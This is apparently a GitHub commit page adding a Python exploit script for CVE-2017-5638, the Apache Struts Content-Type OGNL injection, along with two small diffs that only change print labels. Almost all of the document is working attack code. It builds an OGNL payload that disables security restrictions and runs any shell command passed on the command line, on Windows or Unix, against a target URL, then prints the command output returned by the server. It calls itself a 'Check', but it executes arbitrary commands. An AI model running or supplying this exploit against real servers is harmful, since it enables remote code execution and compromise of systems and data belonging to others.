xsscx · March 10, 2017 16:51 · Mar 10, 2017 · Mar 10, 2017 · Mar 10, 2017
diff --git a/CVE-2017-5638.py b/CVE-2017-5638.py
@@ -44,7 +44,7 @@ def exploit(url, cmd):
         response = urllib2.urlopen(req)
         the_page = response.read()
 
-    print("\nObject get.request")
+    print("\nObject get.request aka Response Code")
     print(requests.get(url, headers=headers,verify=False))
     print("\nPAYLOAD SENT")
     print(payload)

diff --git a/CVE-2017-5638.py b/CVE-2017-5638.py
@@ -52,7 +52,7 @@ def exploit(url, cmd):
     print(request.url)
     print("\nObject request.headers")
     print(request.headers)
-    print("\nObject request.request aka Application Response Code")
+    print("\nObject request.request")
     print(request.request)
     print("\nObject headers")
     print(headers)

diff --git a/CVE-2017-5638.py b/CVE-2017-5638.py
@@ -0,0 +1,88 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import urllib2
+import urllib3
+import requests
+import httplib
+import logging
+
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def exploit(url, cmd):
+    payload = "%{(#_='multipart/form-data')."
+    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
+    payload += "(#_memberAccess?"
+    payload += "(#_memberAccess=#dm):"
+    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
+    payload += "(#ognlUtil.getExcludedClasses().clear())."
+    payload += "(#context.setMemberAccess(#dm))))."
+    payload += "(#cmd='%s')." % cmd
+    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
+    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
+    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+    payload += "(#ros.flush())}"
+
+    try:
+
+        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
+        #request = urllib2.Request(url, headers=headers)
+        request = requests.get(url, headers=headers,verify=False)
+        #page = urllib2.urlopen(request).read()
+
+    except httplib.IncompleteRead, e:
+
+        request = e.partial
+        data = urllib.urlencode(values)
+        req = urllib2.Request(url, data)
+        response = urllib2.urlopen(req)
+        the_page = response.read()
+
+    print("\nObject get.request")
+    print(requests.get(url, headers=headers,verify=False))
+    print("\nPAYLOAD SENT")
+    print(payload)
+    print("\nObject request.URL")
+    print(request.url)
+    print("\nObject request.headers")
+    print(request.headers)
+    print("\nObject request.request aka Application Response Code")
+    print(request.request)
+    print("\nObject headers")
+    print(headers)
+    print("\nObject request.TEXT aka This is what you are looking for...")
+    print(request.text)
+
+try:
+    import http.client as http_client
+except ImportError:
+    # Python 2
+    import httplib as http_client
+http_client.HTTPConnection.debuglevel = 0
+print("Check for CVE-2017-5638 by XSS.Cx\n")
+logging.basicConfig()
+logging.getLogger().setLevel(logging.DEBUG)
+requests_log = logging.getLogger("requests.packages.urllib3")
+requests_log.setLevel(logging.DEBUG)
+requests_log.propagate = True
+
+if __name__ == '__main__':
+
+    import sys
+    if len(sys.argv) != 3:
+        print("[*] struts.py <url> <cmd>")
+
+    else:
+
+        print('[*] Checking Site....')
+        url = sys.argv[1]
+        cmd = sys.argv[2]
+        print("[*] cmd: %s\n" % cmd)
+        print(url, cmd)
+        exploit(url, cmd)
No results found